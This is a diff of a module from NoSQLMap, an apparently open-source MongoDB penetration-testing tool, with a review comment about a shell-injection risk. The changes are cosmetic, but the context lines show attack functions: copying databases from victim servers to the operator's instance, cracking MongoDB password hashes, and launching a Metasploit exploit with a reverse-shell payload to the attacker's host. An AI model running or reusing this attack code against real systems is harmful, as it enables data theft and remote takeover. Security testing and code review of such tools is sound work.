11#!/usr/bin/python
2- #NoSQLMap Copyright 2016 Russell Butturini
3- #This program is free software: you can redistribute it and/or modify
4- # it under the terms of the GNU General Public License as published by
5- #the Free Software Foundation, either version 3 of the License, or
6- #(at your option) any later version.
7-
8- #This program is distributed in the hope that it will be useful,
9- #but WITHOUT ANY WARRANTY; without even the implied warranty of
10- #MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
11- #GNU General Public License for more details.
12-
13- #You should have received a copy of the GNU General Public License
14- #along with this program. If not, see <http://www.gnu.org/licenses/>.
2+ # NoSQLMap Copyright 2012-2017 NoSQLMap Development team
3+ # See the file 'doc/COPYING' for copying permission
4+
155import pymongo
166import urllib
177import json
2212from hashlib import md5
2313import os
2414
15+
2516global yes_tag
2617global no_tag
2718yes_tag = ['y' , 'Y' ]
2819no_tag = ['n' , 'N' ]
2920
21+
3022def netAttacks (target , dbPort , myIP , myPort ):
3123 print "DB Access attacks (MongoDB)"
3224 print "================="
3325 mgtOpen = False
3426 webOpen = False
3527 mgtSelect = True
36- #This is a global for future use with other modules; may change
28+ # This is a global for future use with other modules; may change
3729 global dbList
3830 dbList = []
3931
@@ -70,7 +62,7 @@ def netAttacks(target, dbPort, myIP, myPort):
7062
7163
7264 mgtUrl = "http://" + target + ":28017"
73- #Future rev: Add web management interface parsing
65+ # Future rev: Add web management interface parsing
7466
7567 try :
7668 mgtRespCode = urllib .urlopen (mgtUrl ).getcode ()
@@ -138,6 +130,7 @@ def netAttacks(target, dbPort, myIP, myPort):
138130 if attack == "6" :
139131 return
140132
133+
141134def stealDBs (myDB ,victim ,mongoConn ):
142135 dbList = mongoConn .database_names ()
143136 dbLoot = True
@@ -161,7 +154,7 @@ def stealDBs(myDB,victim,mongoConn):
161154 break
162155
163156 try :
164- #Mongo can only pull, not push, connect to my instance and pull from verified open remote instance.
157+ # Mongo can only pull, not push, connect to my instance and pull from verified open remote instance.
165158 dbNeedCreds = raw_input ("Does this database require credentials (y/n)? " )
166159 myDBConn = pymongo .MongoClient (myDB , 27017 )
167160 if dbNeedCreds in no_tag :
@@ -195,6 +188,7 @@ def stealDBs(myDB,victim,mongoConn):
195188 raw_input ("Something went wrong. Are you sure your MongoDB is running and options are set? Press enter to return..." )
196189 return
197190
191+
198192def passCrack (user , encPass ):
199193 select = True
200194 print "Select password cracking method: "
@@ -217,13 +211,15 @@ def passCrack (user, encPass):
217211 return
218212 return
219213
214+
220215def gen_pass (user , passw , hashVal ):
221216 if md5 (user + ":mongo:" + str (passw )).hexdigest () == hashVal :
222217 print "Found - " + user + ":" + passw
223218 return True
224219 else :
225220 return False
226221
222+
227223def dict_pass (user ,key ):
228224 loadCheck = False
229225
@@ -245,9 +241,11 @@ def dict_pass(user,key):
245241 break
246242 return
247243
244+
248245def genBrute (chars , maxLen ):
249246 return ('' .join (candidate ) for candidate in itertools .chain .from_iterable (itertools .product (chars , repeat = i ) for i in range (1 , maxLen + 1 )))
250247
248+
251249def brute_pass (user ,key ):
252250 charSel = True
253251 print "\n "
@@ -287,6 +285,7 @@ def brute_pass(user,key):
287285 break
288286 return
289287
288+
290289def getPlatInfo (mongoConn ):
291290 print "Server Info:"
292291 print "MongoDB Version: " + mongoConn .server_info ()['version' ]
@@ -295,6 +294,7 @@ def getPlatInfo (mongoConn):
295294 print "\n "
296295 return
297296
297+
298298def enumDbs (mongoConn ):
299299 try :
300300 print "List of databases:"
@@ -333,6 +333,7 @@ def enumDbs (mongoConn):
333333 print "\n "
334334 return
335335
336+
336337def msfLaunch ():
337338 try :
338339 proc = subprocess .call ("msfcli exploit/linux/misc/mongod_native_helper RHOST=" + str (victim ) + " DB=local PAYLOAD=linux/x86/shell/reverse_tcp LHOST=" + str (myIP ) + " LPORT=" + str (myPort ) + " E" , shell = True )
@@ -342,6 +343,7 @@ def msfLaunch():
342343 raw_input ("Press enter to continue..." )
343344 return
344345
346+
345347def enumGrid (mongoConn ):
346348 try :
347349 for dbItem in mongoConn .database_names ():
@@ -361,6 +363,7 @@ def enumGrid (mongoConn):
361363
362364 return
363365
366+
364367def mongoScan (ip ,port ,pingIt ):
365368
366369 if pingIt == True :
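Review bot: In msfLaunch (the `@@ -333,6 +333,7` hunk) the msfcli command is still built by string concatenation and run with `shell=True`, so any shell metacharacter in `victim`, `myIP` or `myPort` is interpreted by the shell instead of being passed as data. Since this commit is already a cleanup pass over the file, pass the arguments as a list and drop `shell=True`, e.g. `subprocess.call(["msfcli", "exploit/linux/misc/mongod_native_helper", "RHOST=" + str(victim), ...])` with each remaining `KEY=value` item as its own list element. Those three names are not parameters of msfLaunch and no `global` statement is visible in the hunk, so they are presumably module-level values set elsewhere; a short comment saying where they come from, or taking them as arguments, would make that dependency explicit. The function body continues outside the hunk.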